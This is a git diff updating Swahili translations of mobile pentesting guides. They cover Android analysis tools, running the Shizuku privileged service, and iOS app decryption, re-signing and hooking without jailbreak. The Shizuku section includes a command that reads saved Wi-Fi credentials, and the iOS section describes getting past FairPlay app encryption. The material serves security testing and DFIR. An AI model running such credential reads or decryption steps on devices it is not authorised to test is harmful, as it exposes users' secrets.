+552,8 @@ MobSF pia inakuwezesha kupakia **scripts za Frida** zako mwenyewe (ili kutuma ma Zaidi ya hayo, una baadhi ya kazi za ziada za Frida: - **Enumerate Loaded Classes**: Itachapisha kila darasa lililopakiwa -- **Capture Strings**: Itachapisha kila nyenzo iliyokamatwa wakati wa kutumia programu (sauti nyingi) -- **Capture String Comparisons**: Inaweza kuwa ya manufaa sana. It **onyesha nyenzo 2 zinazolinganishwa** na ikiwa matokeo yalikuwa Kweli au Uongo. +- **Capture Strings**: Itachapisha kila mfuatano wa maandiko wakati wa kutumia programu (sauti nyingi) +- **Capture String Comparisons**: Inaweza kuwa ya manufaa sana. It **onyesha maandiko 2 yanayolinganishwa** na ikiwa matokeo yalikuwa Kweli au Uongo. - **Enumerate Class Methods**: Weka jina la darasa (kama "java.io.File") na itachapisha mbinu zote za darasa hilo. - **Search Class Pattern**: Tafuta madarasa kwa muundo - **Trace Class Methods**: **Trace** **darasa zima** (ona ingizo na matokeo ya mbinu zote za darasa hilo). Kumbuka kwamba kwa kawaida MobSF inafuatilia mbinu kadhaa za kuvutia za Android Api. @@ -573,13 +573,13 @@ receivers ``` **HTTP tools** -Wakati trafiki ya http inakamatwa unaweza kuona mtazamo mbaya wa trafiki iliyokamatwa kwenye "**HTTP(S) Traffic**" chini au mtazamo mzuri kwenye "**Start HTTPTools**" kitufe kibichi. Kutoka kwenye chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\ +Wakati trafiki ya http inakamatwa unaweza kuona mtazamo mbaya wa trafiki iliyokamatwa kwenye "**HTTP(S) Traffic**" chini au mtazamo mzuri kwenye "**Start HTTPTools**" kijani chini. Kutoka kwenye chaguo la pili, unaweza **kutuma** **maombi yaliyokamatwa** kwa **proxies** kama Burp au Owasp ZAP.\ Ili kufanya hivyo, _washa Burp -->_ _zimisha Intercept --> katika MobSB HTTPTools chagua ombi_ --> bonyeza "**Send to Fuzzer**" --> _chagua anwani ya proxy_ ([http://127.0.0.1:8080\\](http://127.0.0.1:8080)). -Mara tu unapo maliza uchambuzi wa dynamic na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz maombi ya http** na kutafuta udhaifu. +Mara tu unapo maliza uchambuzi wa dynamic na MobSF unaweza kubonyeza "**Start Web API Fuzzer**" ili **fuzz http requests** na kutafuta udhaifu. > [!TIP] -> Baada ya kufanya uchambuzi wa dynamic na MobSF mipangilio ya proxy inaweza kuwa na makosa na huwezi kuziweka sawa kutoka kwenye GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya: +> Baada ya kufanya uchambuzi wa dynamic na MobSF mipangilio ya proxy inaweza kuwa na makosa na huwezi kuziweka kutoka kwenye GUI. Unaweza kurekebisha mipangilio ya proxy kwa kufanya: > > ``` > adb shell settings put global http_proxy :0 @@ -592,13 +592,13 @@ Chombo hiki kitatumia **Hooks** kukujulisha **kila kinachotokea katika programu* ### [Yaazhini](https://www.vegabird.com/yaazhini/) -Hii ni **chombo kizuri kufanya uchambuzi wa static na GUI** +Hii ni **chombo kizuri kufanya uchambuzi wa statiki na GUI** ![](<../../images/image (741).png>) ### [Qark](https://github.com/linkedin/qark) -Chombo hiki kimeundwa kutafuta udhaifu kadhaa **yanayohusiana na usalama wa programu za Android**, iwe katika **kanuni ya chanzo** au **APKs zilizopakiwa**. Chombo hiki pia **kina uwezo wa kuunda "Proof-of-Concept" APK inayoweza kutekelezwa** na **amri za ADB**, ili kutumia baadhi ya udhaifu uliofindika (Shughuli zilizofichuliwa, nia, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa kinachojaribiwa. +Chombo hiki kimeundwa kutafuta **udhaifu kadhaa zinazohusiana na usalama wa programu za Android**, iwe katika **msimbo wa chanzo** au **APKs zilizopakiwa**. Chombo hiki pia **kina uwezo wa kuunda "Proof-of-Concept" APK inayoweza kutekelezwa** na **amri za ADB**, ili kutumia baadhi ya udhaifu zilizopatikana (Shughuli zilizofichuliwa, nia, tapjacking...). Kama ilivyo kwa Drozer, hakuna haja ya ku-root kifaa cha mtihani. ```bash pip3 install --user qark # --user is only needed if not using a virtualenv qark --apk path/to/my.apk @@ -608,7 +608,7 @@ qark --java path/to/specific/java/file.java ### [**ReverseAPK**](https://github.com/1N3/ReverseAPK.git) - Inaonyesha faili zote zilizotolewa kwa ajili ya rejeleo rahisi -- Inachambua faili za APK kiotomatiki hadi Java na Smali format +- Inachambua faili za APK moja kwa moja hadi katika muundo wa Java na Smali - Changanua AndroidManifest.xml kwa ajili ya udhaifu na tabia za kawaida - Uchambuzi wa msimbo wa chanzo wa statiki kwa ajili ya udhaifu na tabia za kawaida - Taarifa za kifaa @@ -630,7 +630,7 @@ super-analyzer {apk_file} ![](<../../images/image (297).png>) -StaCoAn ni chombo **crossplatform** ambacho kinawasaidia waendelezaji, wawindaji wa makosa na hackers wa kimaadili kufanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za simu. +StaCoAn ni chombo **crossplatform** ambacho husaidia waendelezaji, wawindaji wa makosa na hackers wa kimaadili wanaofanya [static code analysis](https://en.wikipedia.org/wiki/Static_program_analysis) kwenye programu za simu. Wazo ni kwamba unavuta na kuacha faili yako ya programu ya simu (faili .apk au .ipa) kwenye programu ya StaCoAn na itaunda ripoti ya kuona na kubebeka kwako. Unaweza kubadilisha mipangilio na orodha za maneno ili kupata uzoefu wa kibinafsi. @@ -640,7 +640,7 @@ Pakua [latest release](https://github.com/vincentcox/StaCoAn/releases): ``` ### [AndroBugs](https://github.com/AndroBugs/AndroBugs_Framework) -AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android ambao unawasaidia waendelezaji au hackers kupata udhaifu wa usalama unaoweza kutokea katika programu za Android.\ +AndroBugs Framework ni mfumo wa uchambuzi wa udhaifu wa Android unaosaidia waendelezaji au hackers kupata udhaifu wa usalama unaoweza kutokea katika programu za Android.\ [Windows releases](https://github.com/AndroBugs/AndroBugs_Framework/releases) ``` python androbugs.py -f [APK file] @@ -648,11 +648,11 @@ androbugs.exe -f [APK file] ``` ### [Androwarn](https://github.com/maaaaz/androwarn) -**Androwarn** ni chombo chenye lengo kuu la kugundua na kumwonya mtumiaji kuhusu tabia mbaya zinazoweza kutokea kutoka kwa programu ya Android. +**Androwarn** ni chombo ambacho lengo lake kuu ni kugundua na kumwonya mtumiaji kuhusu tabia mbaya zinazoweza kutokea zinazotengenezwa na programu ya Android. -Gundua inafanywa kwa **uchambuzi wa statiki** wa bytecode ya Dalvik ya programu, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard). +Ugunduzi unafanywa kwa **uchambuzi wa statiki** wa bytecode ya Dalvik ya programu, inayowakilishwa kama **Smali**, kwa kutumia maktaba ya [`androguard`](https://github.com/androguard/androguard). -Chombo hiki kinatafuta **tabia za kawaida za programu "mbaya"** kama: Uhamasishaji wa vitambulisho vya Simu, Ukatishaji wa mtiririko wa sauti/video, Marekebisho ya data za PIM, Utekelezaji wa msimbo wa kiholela... +Chombo hiki kinatafuta **tabia za kawaida za programu "mbaya"** kama: uhamasishaji wa vitambulisho vya Simu, upokeaji wa mtiririko wa sauti/video, mabadiliko ya data za PIM, utekelezaji wa msimbo wa kiholela... ``` python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3 ``` @@ -660,13 +660,13 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3 ![](<../../images/image (595).png>) -**MARA** ni **M**ifumo wa **A**plication ya **R**everse engineering na **A**nalysis. Ni chombo kinachokusanya zana zinazotumika mara kwa mara za reverse engineering na uchambuzi wa programu za simu, kusaidia katika kupima programu za simu dhidi ya vitisho vya usalama wa simu vya OWASP. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa programu za simu na wataalamu wa usalama. +**MARA** ni **M**obile **A**pplication **R**everse engineering na **A**nalysis Framework. Ni chombo ambacho kinaweka pamoja zana zinazotumika mara kwa mara za uhandisi wa nyuma na uchambuzi wa programu za simu, kusaidia katika kupima programu za simu dhidi ya vitisho vya usalama wa simu vya OWASP. Lengo lake ni kufanya kazi hii iwe rahisi na rafiki kwa watengenezaji wa programu za simu na wataalamu wa usalama. -Inauwezo wa: +Inaweza: -- Kutolewa kwa msimbo wa Java na Smali kwa kutumia zana tofauti +- Kutolewa Java na Smali code kwa kutumia zana tofauti - Kuchambua APKs kwa kutumia: [smalisca](https://github.com/dorneanu/smalisca), [ClassyShark](https://github.com/google/android-classyshark), [androbugs](https://github.com/AndroBugs/AndroBugs_Framework), [androwarn](https://github.com/maaaaz/androwarn), [APKiD](https://github.com/rednaga/APKiD) -- Kutolewa kwa taarifa za kibinafsi kutoka kwa APK kwa kutumia regexps. +- Kutolewa taarifa za kibinafsi kutoka kwa APK kwa kutumia regexps. - Kuchambua Manifest. - Kuchambua maeneo yaliyopatikana kwa kutumia: [pyssltest](https://github.com/moheshmohan/pyssltest), [testssl](https://github.com/drwetter/testssl.sh) na [whatweb](https://github.com/urbanadventurer/WhatWeb) - Kuondoa obfuscation ya APK kupitia [apk-deguard.com](http://www.apk-deguard.com) @@ -681,7 +681,7 @@ Kumbuka kwamba kulingana na huduma na usanidi unayotumia kuondoa obfuscation ya ### [ProGuard]() -Kutoka [Wikipedia](): **ProGuard** ni chombo cha amri cha chanzo wazi kinachopunguza, kuboresha na kuondoa obfuscation ya msimbo wa Java. Inaweza kuboresha bytecode pamoja na kugundua na kuondoa maagizo yasiyotumika. ProGuard ni programu ya bure na inasambazwa chini ya GNU General Public License, toleo la 2. +Kutoka [Wikipedia](): **ProGuard** ni chombo cha amri cha chanzo wazi ambacho kinapunguza, kinaboresha na kinatoa obfuscation kwa Java code. Inaweza kuboresha bytecode pamoja na kugundua na kuondoa maagizo yasiyotumika. ProGuard ni programu ya bure na inasambazwa chini ya GNU General Public License, toleo la 2. ProGuard inasambazwa kama sehemu ya Android SDK na inafanya kazi wakati wa kujenga programu katika hali ya kutolewa. @@ -691,11 +691,11 @@ Pata mwongozo wa hatua kwa hatua wa kuondoa obfuscation ya apk katika [https://b (Kutoka kwa mwongozo huo) Mara ya mwisho tulipoangalia, hali ya uendeshaji ya Dexguard ilikuwa: -- kupakia rasilimali kama InputStream; -- kutoa matokeo kwa darasa linalorithi kutoka FilterInputStream ili kuyafungua; -- kufanya obfuscation isiyo na maana ili kupoteza dakika chache za muda kutoka kwa mabadiliko; -- kutoa matokeo yaliyofunguliwa kwa ZipInputStream ili kupata faili ya DEX; -- hatimaye kupakia DEX inayotokana kama Rasilimali kwa kutumia njia ya `loadDex`. +- pakua rasilimali kama InputStream; +- peleka matokeo kwa darasa linalorithi kutoka FilterInputStream ili kuyafungua; +- fanya obfuscation isiyo na maana ili kupoteza dakika chache za wakati kutoka kwa mhandisi wa nyuma; +- peleka matokeo yaliyofunguliwa kwa ZipInputStream ili kupata faili ya DEX; +- hatimaye pakua DEX inayotokana kama Rasilimali kwa kutumia njia ya `loadDex`. ### [DeGuard](http://apk-deguard.com) @@ -713,7 +713,7 @@ Ni **deobfuscator ya android ya jumla.** Simplify **inatekeleza programu kwa kar ### [APKiD](https://github.com/rednaga/APKiD) -APKiD inakupa taarifa kuhusu **jinsi APK ilivyotengenezwa**. Inatambua waandishi wengi, **packers**, **obfuscators**, na vitu vingine vya ajabu. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android. +APKiD inakupa taarifa kuhusu **jinsi APK ilivyotengenezwa**. Inatambua **kompila**, **packers**, **obfuscators**, na vitu vingine vya ajabu. Ni [_PEiD_](https://www.aldeid.com/wiki/PEiD) kwa Android. ### Manual @@ -723,7 +723,7 @@ APKiD inakupa taarifa kuhusu **jinsi APK ilivyotengenezwa**. Inatambua waandishi ### [Androl4b](https://github.com/sh4hin/Androl4b) -AndroL4b ni mashine ya virtual ya usalama ya Android inayotegemea ubuntu-mate inajumuisha mkusanyiko wa mfumo wa hivi karibuni, mafunzo na maabara kutoka kwa wahandisi wa usalama na watafiti mbalimbali kwa ajili ya reverse engineering na uchambuzi wa malware. +AndroL4b ni mashine ya virtual ya usalama ya Android inayotegemea ubuntu-mate inajumuisha mkusanyiko wa mfumo wa hivi karibuni, mafunzo na maabara kutoka kwa wahandisi wa usalama na watafiti mbalimbali kwa ajili ya uhandisi wa nyuma na uchambuzi wa malware. ## References diff --git a/src/mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md b/src/mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md index 8dd621836..455ac9a7e 100644 --- a/src/mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md +++ b/src/mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md @@ -2,13 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -Shizuku ni huduma ya chanzo wazi ambayo **inasababisha mchakato wa Java wenye mamlaka kwa kutumia `app_process`** na kufichua **APIs za mfumo wa Android kupitia Binder**. Kwa sababu mchakato unazinduliwa kwa uwezo sawa wa **`shell` UID ambao ADB inatumia**, programu yoyote (au terminal) inayounganisha kwenye interface ya AIDL iliyosafirishwa inaweza kufanya vitendo vingi ambavyo kawaida vinahitaji **`WRITE_SECURE_SETTINGS`, `INSTALL_PACKAGES`, I/O ya faili ndani ya `/data`,** nk. – **bila ku-root kifaa**. +Shizuku ni huduma ya chanzo wazi ambayo **inasababisha mchakato wa Java wenye mamlaka kwa kutumia `app_process`** na inatoa **API za mfumo wa Android kupitia Binder**. Kwa sababu mchakato unazinduliwa kwa uwezo sawa wa **`shell` UID ambao ADB inatumia**, programu yoyote (au terminal) inayounganisha kwenye interface ya AIDL iliyosafirishwa inaweza kufanya vitendo vingi ambavyo kawaida vinahitaji **`WRITE_SECURE_SETTINGS`, `INSTALL_PACKAGES`, I/O ya faili ndani ya `/data`,** nk. – **bila ku-root kifaa**. Matumizi ya kawaida: * Ukaguzi wa usalama kutoka kwa simu isiyo na root -* Kuondoa bloatware / debloating apps za mfumo -* Kukusanya kumbukumbu, funguo za Wi-Fi, taarifa za mchakato na socket kwa ajili ya blue-team/DFIR -* Kuandaa usanidi wa kifaa kutoka kwa programu za kawaida au scripts za shell +* Kuondoa bloatware / kuboresha programu za mfumo +* Kukusanya kumbukumbu, funguo za Wi-Fi, taarifa za mchakato na socket kwa ajili ya timu ya buluu/DFIR +* Kuandaa usanidi wa kifaa kutoka kwa programu za kawaida au skripti za shell --- ## 1. Kuanzisha huduma yenye mamlaka @@ -16,11 +16,11 @@ Matumizi ya kawaida: `moe.shizuku.privileged.api` inaweza kuanzishwa kwa njia tatu tofauti – huduma ya Binder inayotokana inafanya kazi sawa katika zote. ### 1.1 ADB isiyo na waya (Android 11+) -1. Wezesha **Chaguzi za Mwandishi ➜ Ufuatiliaji usio na waya** na uunganishe kifaa. +1. Washa **Chaguzi za Mwandishi ➜ Ufuatiliaji usio na waya** na uunganishe kifaa. 2. Ndani ya programu ya Shizuku chagua **“Anza kupitia ufuatiliaji usio na waya”** na nakili msimbo wa kuunganisha. -3. Huduma inakaa hai hadi kuanzisha tena kwa pili (sessions za ufuatiliaji usio na waya zinaondolewa wakati wa kuanzisha). +3. Huduma inakaa hai hadi kuanzishwa tena kwa kifaa (sessions za ufuatiliaji usio na waya zinaondolewa wakati wa kuanzisha). -### 1.2 USB / ADB ya ndani one-liner +### 1.2 USB / ADB ya ndani moja-laini ```bash adb push start.sh \ /storage/emulated/0/Android/data/moe.shizuku.privileged.api/ @@ -28,10 +28,10 @@ adb push start.sh \ # spawn the privileged process adb shell sh /storage/emulated/0/Android/data/moe.shizuku.privileged.api/start.sh ``` -Skripti hiyo hiyo inaweza kutekelezwa kupitia **network ADB** connection (`adb connect :5555`). +Ile ile script inaweza kutekelezwa kupitia **network ADB** connection (`adb connect :5555`). -### 1.3 Vifaa vilivyopandishwa mizizi -Ikiwa kifaa tayari kimepandishwa mizizi, endesha: +### 1.3 Vifaa vilivyo na root +Ikiwa kifaa tayari kimepata root, endesha: ```bash su -c sh /data/adb/shizuku/start.sh ``` @@ -83,11 +83,11 @@ for pid in $(lsof -nP -iTCP -sTCP:LISTEN -t); do printf "%s -> %s\n" "$pid" "$(cat /proc/$pid/cmdline)"; done ``` -* Dump kila logi ya programu: +* Dump kila log ya programu: ```bash logcat -d | grep -iE "(error|exception)" ``` -* Soma akiba ya hati za Wi-Fi (Android 11 +): +* Soma akcredentials za Wi-Fi zilizohifadhiwa (Android 11 +): ```bash cat /data/misc/wifi/WifiConfigStore.xml | grep -i "" ``` @@ -98,13 +98,13 @@ pm uninstall --user 0 com.miui.weather2 --- ## 4. Maoni ya usalama / ugunduzi -1. Shizuku inahitaji **ADB debugging** ruhusa, kwa hivyo _Chaguzi za Mwandishi → USB/Wireless debugging_ lazima iwe **imewezeshwa**. +1. Shizuku inahitaji **ADB debugging** ruhusa, kwa hivyo _Chaguo za Mwandishi → USB/Wireless debugging_ lazima iwe **imewezeshwa**. Mashirika yanaweza kuzuia hii kupitia MDM au kupitia `settings put global development_settings_enabled 0`. 2. Huduma inajisajili chini ya jina `moe.shizuku.privileged.api`. Amri rahisi `adb shell service list | grep shizuku` (au sheria ya Usalama wa Endpoint) inagundua uwepo wake. 3. Uwezo umewekwa mipaka kwa kile ambacho mtumiaji `shell` anaweza tayari kufanya – si **root**. APIs nyeti zinazohitaji mtumiaji `system` au `root` bado hazipatikani. -4. Sesheni hazidumu **baada ya kuanzisha upya** isipokuwa kifaa kimekuwa root na Shizuku imewekwa kama daemon ya kuanzisha. +4. Sesheni hazidumu **baada ya kuanzisha upya** isipokuwa kifaa kimekuwa rooted na Shizuku imewekwa kama daemon ya kuanzisha. --- ## 5. Kupunguza @@ -113,7 +113,7 @@ APIs nyeti zinazohitaji mtumiaji `system` au `root` bado hazipatikani. * Tumia sera za SELinux (Android enterprise) kuzuia interface ya AIDL kutoka kwa programu zisizodhibitiwa. --- -## Marejeleo +## Marejeo - [Blog – Shizuku: Kufungua Uwezo wa Juu wa Android Bila Root](https://www.mobile-hacker.com/2025/07/14/shizuku-unlocking-advanced-android-capabilities-without-root/) - [Hati Rasmi za Shizuku](https://shizuku.rikka.app/) diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md index 5ed97387b..a0d57eb68 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md +++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md @@ -4,30 +4,30 @@ ## Wazo Kuu -Programu zilizosainiwa na **entitlement `get_task_allow`** zinawaruhusu programu za upande wa tatu kuendesha kazi inayoitwa **`task_for_pid()`** na kitambulisho cha mchakato wa programu ya awali kama hoja ili kupata bandari ya kazi juu yake (kuwa na uwezo wa kuidhibiti na kufikia kumbukumbu yake). +Programu zilizosainiwa na **entitlement `get_task_allow`** zinaruhusu programu za upande wa tatu kuendesha kazi inayoitwa **`task_for_pid()`** na kitambulisho cha mchakato wa programu ya awali kama hoja ili kupata bandari ya kazi juu yake (kuwa na uwezo wa kuidhibiti na kufikia kumbukumbu yake). -Hata hivyo, si rahisi kama tu kuvuta IPA, kuisaini tena na entitlement, na kuirudisha kwenye kifaa chako. Hii ni kwa sababu ya ulinzi wa FairPlay. Wakati saini ya programu inabadilika, funguo za DRM (Usimamizi wa Haki za Kidijitali) **zinabatilishwa na programu haitafanya kazi**. +Hata hivyo, si rahisi kama tu kuvuta IPA, kuisaini tena na entitlement, na kuirudisha kwenye kifaa chako. Hii ni kwa sababu ya ulinzi wa FairPlay. Wakati saini ya programu inabadilika, funguo za DRM (Digital Rights Management) **zinabatilishwa na programu haitafanya kazi**. -Kwa kifaa cha zamani kilichovunjwa, inawezekana kufunga IPA, **kuikodisha kwa kutumia chombo unachokipenda** (kama Iridium au frida-ios-dump), na kuirudisha kutoka kwenye kifaa. Ingawa, ikiwa inawezekana, inapendekezwa kuwasiliana na mteja kwa IPA iliyokodishwa. +Kwa kifaa cha zamani kilichovunjwa, inawezekana kufunga IPA, **kuikodisha kwa kutumia chombo unachokipenda** (kama Iridium au frida-ios-dump), na kuirudisha kutoka kwenye kifaa. Ingawa, ikiwa inawezekana, inapendekezwa kuomba tu kwa mteja kwa IPA iliyokodishwa. ## Pata IPA iliyokodishwa ### Pata kutoka Apple -1. Sakinisha programu ya kupima kwenye iPhone -2. Sakinisha na uzindue [Apple Configurator](https://apps.apple.com/au/app/apple-configurator/id1037126344?mt=12) ndani ya macos yako +1. Funga programu ya kupima kwenye iPhone +2. Funga na uzindue [Apple Configurator](https://apps.apple.com/au/app/apple-configurator/id1037126344?mt=12) ndani ya macos yako 3. Fungua `Terminal` kwenye Mac yako, na cd hadi `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps`. IPA itaonekana katika folda hii baadaye. 4. Unapaswa kuona kifaa chako cha iOS. Bonyeza mara mbili juu yake, kisha bonyeza Ongeza + → Programu kutoka kwenye menyu ya juu. -5. Baada ya kubonyeza Ongeza, Configurator itashusha IPA kutoka Apple, na kujaribu kuisukuma kwenye kifaa chako. Ikiwa ulifuata mapendekezo yangu awali na tayari umesakinisha IPA, ujumbe wa kukuuliza upya kusakinisha programu utaonekana. +5. Baada ya kubonyeza Ongeza, Configurator itashusha IPA kutoka Apple, na kujaribu kuisukuma kwenye kifaa chako. Ikiwa ufuatiliaji wa mapendekezo yangu hapo awali na umefunga IPA tayari, ujumbe wa kukuuliza ufungue programu tena utaonekana. 6. IPA inapaswa kushushwa ndani ya `/Users/[username]/Library/Group\\ Containers/K36BKF7T3D.group.com.apple.configurator/Library/Caches/Assets/TemporaryItems/MobileApps` ambapo unaweza kuichukua. Angalia [https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed](https://dvuln.com/blog/modern-ios-pentesting-no-jailbreak-needed) kwa maelezo zaidi kuhusu mchakato huu. ### Kuikodisha programu -Ili kuikodisha IPA tunakwenda kuisakinisha. Hata hivyo, ikiwa una iPhone ya zamani iliyovunjwa, huenda toleo lake halitaungwa mkono na programu kwani kawaida programu zinasaidia tu toleo za hivi karibuni. +Ili kuikodisha IPA tunakwenda kuifunga. Hata hivyo, ikiwa una iPhone ya zamani iliyovunjwa, huenda toleo lake halitasaidiwa na programu kwani kawaida programu zinasaidia tu matoleo ya hivi karibuni. -Hivyo, ili kuisakinisha, fungua IPA: +Hivyo, ili kuifunga, fungua tu IPA: ```bash unzip redacted.ipa -d unzipped ``` @@ -44,14 +44,14 @@ ideviceinstaller -i no-min-version.ipa -w ``` Note that you might need **AppSync Unified tweak** from Cydia to prevent any `invalid signature` errors. -Once intalled, you can use **Iridium tweak** from Cydia in order to obtain the decrypted IPA. +Once installed, you can use **Iridium tweak** from Cydia in order to obtain the decrypted IPA. ### Patch entitlements & re-sign -Ili ku-sign upya programu na `get-task-allow` entitlement kuna zana kadhaa zinazopatikana kama `app-signer`, `codesign`, na `iResign`. `app-signer` ina kiolesura rafiki cha mtumiaji ambacho kinaruhusu ku-sign upya faili ya IPA kwa urahisi kwa kuashiria IPA ya ku-sign upya, kuweka `get-taks-allow` na cheti na profaili ya usambazaji ya kutumia. +Ili ku-sign upya programu na `get-task-allow` entitlement kuna zana kadhaa zinazopatikana kama `app-signer`, `codesign`, na `iResign`. `app-signer` ina kiolesura rafiki cha mtumiaji ambacho kinaruhusu ku-sign upya faili ya IPA kwa urahisi kwa kuashiria IPA ya ku-sign upya, kuweka `get-task-allow` na cheti na profaili ya usambazaji ya kutumia. -Kuhusu cheti na profaili za kusaini, Apple inatoa **free developer signing profiles** kwa akaunti zote kupitia Xcode. Unda tu programu na uipange. Kisha, panga **iPhone kuamini programu za developer** kwa kuenda `Settings` → `Privacy & Security`, na bonyeza `Developer Mode`. +Kuhusu cheti na profaili za kusaini, Apple inatoa **profaili za kusaini za watengenezaji bure** kwa akaunti zote kupitia Xcode. Unda tu programu na uipange. Kisha, panga **iPhone kuamini programu za watengenezaji** kwa kuenda `Settings` → `Privacy & Security`, na bonyeza `Developer Mode`. With the re-signed IPA, it's time to install it in the device to pentest it: ```bash @@ -59,15 +59,15 @@ ideviceinstaller -i resigned.ipa -w ``` --- -### Wezesha Hali ya Mwandishi (iOS 16+) +### Wezesha Hali ya Mwandamizi (iOS 16+) -Tangu iOS 16 Apple ilianzisha **Hali ya Mwandishi**: binary yoyote inayobeba `get_task_allow` *au* iliyosainiwa na cheti cha maendeleo itakataa kuanzishwa hadi Hali ya Mwandishi iwezeshwe kwenye kifaa. Hutaweza pia kuunganisha Frida/LLDB isipokuwa bendera hii iwepo. +Tangu iOS 16 Apple ilianzisha **Hali ya Mwandamizi**: binary yoyote inayobeba `get_task_allow` *au* iliyosainiwa na cheti cha maendeleo itakataa kuanzishwa hadi Hali ya Mwandamizi iwezeshwe kwenye kifaa. Hutaweza pia kuunganisha Frida/LLDB isipokuwa bendera hii iwepo. -1. Sakinisha au sukuma **yoyote** IPA iliyosainiwa na mwandishi kwenye simu. -2. Nenda kwenye **Mipangilio → Faragha & Usalama → Hali ya Mwandishi** na iwashe. -3. Kifaa kitaanzisha upya; baada ya kuingiza nambari ya siri utaulizwa **Washa** Hali ya Mwandishi. +1. Sakinisha au sukuma **yoyote** IPA iliyosainiwa na mwandamizi kwenye simu. +2. Nenda kwenye **Mipangilio → Faragha & Usalama → Hali ya Mwandamizi** na iwashe. +3. Kifaa kitaanzisha upya; baada ya kuingiza nambari ya siri utaulizwa **Washa** Hali ya Mwandamizi. -Hali ya Mwandishi inabaki kuwa hai hadi uizime au kufuta simu, hivyo hatua hii inahitaji kufanywa mara moja kwa kifaa. [Hati za Apple](https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device) zinaelezea athari za usalama. +Hali ya Mwandamizi inabaki hai hadi uizime au kufuta simu, hivyo hatua hii inahitaji kufanywa mara moja tu kwa kifaa. [Apple documentation](https://developer.apple.com/documentation/xcode/enabling-developer-mode-on-a-device) inaelezea athari za usalama. ### Chaguzi za kisasa za sideloading @@ -75,14 +75,14 @@ Sasa kuna njia kadhaa za kisasa za sideloading na kuweka IPAs zilizosainiwa up-t | Chombo | Mahitaji | Nguvu | Mipaka | |--------|----------|-------|--------| -| **AltStore 2 / SideStore** | msaidizi wa macOS/Windows/Linux anayesaini tena IPA kila siku 7 kwa profaili ya bure ya mwandishi | Upakuaji wa moja kwa moja kupitia Wi-Fi, inafanya kazi hadi iOS 17 | Inahitaji kompyuta kwenye mtandao mmoja, kikomo cha programu 3 kilichowekwa na Apple | -| **TrollStore 1/2** | Kifaa kwenye iOS 14 – 15.4.1 kilichokuwa na udhaifu wa CoreTrust | *Saini ya kudumu* (hakuna kikomo cha siku 7); hakuna kompyuta inayohitajika mara baada ya kusakinishwa | Haipatikani kwenye iOS 15.5+ (bug ilirekebishwa) | +| **AltStore 2 / SideStore** | macOS/Windows/Linux mwenzi anayesaini tena IPA kila siku 7 kwa profaili ya bure ya maendeleo | Upakuaji wa moja kwa moja kupitia Wi-Fi, inafanya kazi hadi iOS 17 | Inahitaji kompyuta kwenye mtandao mmoja, kikomo cha programu 3 kilichowekwa na Apple | +| **TrollStore 1/2** | Kifaa kwenye iOS 14 – 15.4.1 kilichokuwa na udhaifu wa CoreTrust | *Saini ya kudumu* (hakuna kikomo cha siku 7); hakuna kompyuta inahitajika mara baada ya kusakinishwa | Haipati msaada kwenye iOS 15.5+ (bug ilirekebishwa) | Kwa pentests za kawaida kwenye toleo la sasa la iOS, Alt/Side-Store mara nyingi ni chaguo bora zaidi. ### Hooking / uhandisi wa dynamic -Unaweza kuhook programu yako kama ilivyo kwenye kifaa kilichofunguliwa mara tu inapokuwa imesainiwa na `get_task_allow` **na** Hali ya Mwandishi ikiwa juu: +Unaweza kuhook programu yako kama ilivyo kwenye kifaa kilichofanywa jailbreak mara tu inapokuwa imesainiwa na `get_task_allow` **na** Hali ya Mwandamizi ikiwa wazi: ```bash # Spawn & attach with objection objection -g "com.example.target" explore @@ -92,9 +92,9 @@ frida -U -f com.example.target -l my_script.js --no-pause ``` Recent Frida releases (>=16) automatically handle pointer authentication and other iOS 17 mitigations, so most existing scripts work out-of-the-box. -### Uchambuzi wa kiotomatiki wa dynamic na MobSF (bila jailbreak) +### Automated dynamic analysis with MobSF (no jailbreak) -[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) inaweza kuingiza IPA iliyosainiwa na developer kwenye kifaa halisi kwa kutumia mbinu ile ile (`get_task_allow`) na inatoa UI ya wavuti yenye kivinjari cha mfumo wa faili, kukamata trafiki na console ya Frida【】. Njia ya haraka ni kuendesha MobSF kwenye Docker kisha kuunganisha iPhone yako kupitia USB: +[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) inaweza kuingiza IPA iliyoidhinishwa na mende kwenye kifaa halisi kwa kutumia mbinu ile ile (`get_task_allow`) na inatoa UI ya wavuti yenye kivinjari cha mfumo wa faili, kukamata trafiki na console ya Frida【】. Njia ya haraka zaidi ni kuendesha MobSF kwenye Docker kisha kuunganisha iPhone yako kupitia USB: ```bash docker pull opensecurity/mobile-security-framework-mobsf:latest docker run -p 8000:8000 --privileged \ @@ -106,8 +106,8 @@ MobSF itapeleka kiotomatiki binary, iwezeshe seva ya Frida ndani ya sandbox ya p ### iOS 17 & Kikwazo cha Modu ya Kufunga -* **Modu ya Kufunga** (Mipangilio → Faragha & Usalama) inazuia linker ya dynamic kupakia maktaba za dynamic zisizo na saini au zilizotiwa saini na nje. Unapojaribu vifaa ambavyo vinaweza kuwa na modhi hii imewezeshwa hakikisha ime **zimwa** au vikao vyako vya 